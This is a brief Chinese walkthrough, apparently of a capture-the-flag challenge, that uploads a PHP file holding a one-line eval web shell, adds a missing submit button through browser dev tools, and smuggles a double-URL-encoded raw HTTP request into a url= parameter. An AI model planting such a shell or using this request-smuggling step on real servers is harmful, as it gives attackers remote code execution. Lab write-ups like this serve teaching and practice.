打开网址

 新建一个文档，在其中写下面的内容，将名字该为1.php

<?php @eval($_POST[cmd]);?>

将1.php提交上去，发现没反应 

 按f12查看后发现没有提交的代码，右键编辑，自己写一个

 <input type="submit" name="submit">

 编辑代码后结果如下

 将1.php提交查询抓包

 修改一下

进行url编码 

 在记事本中，在最后加上%0A，使用替换将%0A全部替换为%0D%0A

 再次url编码

 将结果放到url=后面

 将前两个%253A换成: